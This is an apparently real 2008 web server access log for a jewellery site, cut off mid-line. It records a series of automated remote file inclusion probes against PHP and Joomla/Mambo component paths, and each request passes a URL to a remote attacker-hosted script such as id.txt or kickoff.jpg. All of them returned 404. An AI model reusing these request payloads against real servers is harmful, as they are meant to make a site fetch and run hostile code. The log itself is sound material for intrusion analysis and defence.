124.0.208.252 - - [31/Oct/2008:00:35:41 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:35:41 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:39:55 -0700] "GET /logs/scripts.log/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:15 -0700] "GET /logs/access.log/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:19 -0700] "GET /index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:19 -0700] "GET /logs/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:35 -0700] "GET /logs/access.log/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:36 -0700] "GET /index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:40:36 -0700] "GET /logs/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
200.142.148.142 - - [31/Oct/2008:00:41:53 -0700] "GET /logs/access.log/index.php?place=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
200.142.148.142 - - [31/Oct/2008:00:41:53 -0700] "GET /logs/index.php?place=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:42:22 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:25 -0700] "GET /logs/access_080501.log/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:29 -0700] "GET /logs/access_080501.log/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:29 -0700] "GET /index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:29 -0700] "GET /logs/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:34 -0700] "GET /index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.128.80.16 - - [31/Oct/2008:00:45:34 -0700] "GET /logs/index.php?place=http://acresofdiamonds.org/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
142.165.212.178 - - [31/Oct/2008:00:47:18 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www2.osrd.go.th/webboard/avatars/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
142.165.212.178 - - [31/Oct/2008:00:47:18 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www2.osrd.go.th/webboard/avatars/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
142.165.212.178 - - [31/Oct/2008:00:47:18 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www2.osrd.go.th/webboard/avatars/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.142.148.142 - - [31/Oct/2008:00:49:01 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
200.142.148.142 - - [31/Oct/2008:00:49:01 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:52:19 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:01:00:27 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:01:00:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:01:00